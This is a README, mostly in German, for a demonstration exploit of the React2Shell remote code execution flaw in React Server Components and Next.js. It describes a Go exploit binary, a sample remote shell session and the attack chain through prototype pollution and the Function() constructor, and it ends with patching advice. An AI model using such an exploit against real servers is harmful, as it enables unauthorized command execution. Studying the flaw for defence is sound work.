
This project provides a fully functional demonstration of CVE-2025-55182 (React2Shell) - a critical Remote Code Execution vulnerability in React Server Components and Next.js.
Dieses Projekt bietet eine voll funktionsfähige Demonstration von CVE-2025-55182 (React2Shell) – einer kritischen Sicherheitslücke zur Remote-Codeausführung in React Server Components und Next.js.
Status: ✅ FUNKTIONIERT – Erzielt tatsächliche Befehlsausführung auf verwundbaren Servern
CVE-2025-55182 (7,8 MB kompilierte ausführbare Datei)📥 Demo-Video herunterladen (5,6 MB) – Klicken zum Herunterladen und Ansehen des Exploits in Aktion
Was die Demo zeigt:
cd exploited-server
npm run dev
# Server startet auf http://localhost:3001
cd /Users/subh/Desktop/code-playground/react-2-shell-demo
./CVE-2025-55182
# Bei Eingabeaufforderung:
Target: localhost:3001
Grundlegende Befehle:
subh@rce $ whoami
subh@rce $ pwd
subh@rce $ ls -la
subh@rce $ hostname
Dateioperationen:
subh@rce $ touch hello.txt
[+] Erstellt: hello.txt
subh@rce $ vi hello.txt
[i] Neuen Inhalt eingeben (geben Sie 'EOF' in einer eigenen Zeile ein, um abzuschließen):
Hallo Welt!
EOF
[+] Datei gespeichert: hello.txt
subh@rce $ cat hello.txt
Hallo Welt!
subh@rce $ echo "Neuer Inhalt" > hello.txt
[+] Datei geschrieben
subh@rce $ rm hello.txt
[+] Entfernt: hello.txt
Systeminformationen:
subh@rce $ cat package.json
subh@rce $ node --version
subh@rce $ npm --version
subh@rce $ ps aux
Beenden:
subh@rce $ exit
Dieses Projekt demonstriert:
✅ Echte Ausnutzung – Tatsächliche funktionsfähige RCE auf verwundbaren Systemen ✅ Sicherheitsforschung – Verständnis von Schwachstellen moderner Web-Frameworks ✅ Go-Entwicklung – Kompilieren und Verwenden von Sicherheitstools ✅ Schwachstellenanalyse – CVE-Forschung und Exploit-Techniken ✅ Verantwortungsvolle Offenlegung – Ethische Sicherheitstestpraktiken
react-2-shell-demo/
├── CVE-2025-55182 # Kompiliertes Go-Exploit-Binary
├── main.go # Go-Quellcode
├── exploited-server/ # Verwundbare Next.js-App
│ ├── app/
│ │ ├── actions.ts # Server-Aktionen (verwundbar)
│ │ └── page.tsx # Warnungs-UI
│ └── package.json # Next 15.0.1, React 19.0.0
└── *.md # Dokumentation
CVE-2025-55182 nutzt unsichere Deserialisierung in React Server Components aus:
__proto__Function()-Konstruktor aufrufen1. Multipart-Payload mit bösartigen Chunks erstellen
2. An Next.js Server-Actions-Endpunkt senden
3. Prototyp-Verschmutzung über __proto__:then auslösen
4. Function()-Konstruktor mit Befehl aufrufen
5. Code ausführen und Ausgabe über Weiterleitung zurückgeben
6. Ergebnis aus X-Action-Redirect-Header parsen
KRITISCHE HINWEISE:
README.md – Diese DateiGO_EXPLOIT_USAGE.md – Detaillierte Exploit-NutzungVULNERABLE_SERVER.md – Server-EinrichtungsanleitungEXPLOITATION_GUIDE.md – Technischer TiefgangUSAGE.md – Nutzungsbeispiele und Befehlenpm run dev in exploited-server)./CVE-2025-55182)Dieses Projekt demonstriert erfolgreich:
Für Produktionssysteme:
Sofort auf gepatchte Versionen aktualisieren:
Geheimnisse rotieren, wenn sie vor dem 4. Dezember 2025 offengelegt wurden
Protokolle überwachen auf verdächtige Server-Actions-Aktivitäten
Anwendungen prüfen, die Server Components verwenden
@subhdotsol – Für Bildungs- und Sicherheitsforschungszwecke
Dieser Code dient ausschließlich Bildungs- und autorisierten Sicherheitstestzwecken.
Denken Sie daran: Holen Sie immer die entsprechende Genehmigung ein, bevor Sie testen. Nutzen Sie es verantwortungsvoll! 🔒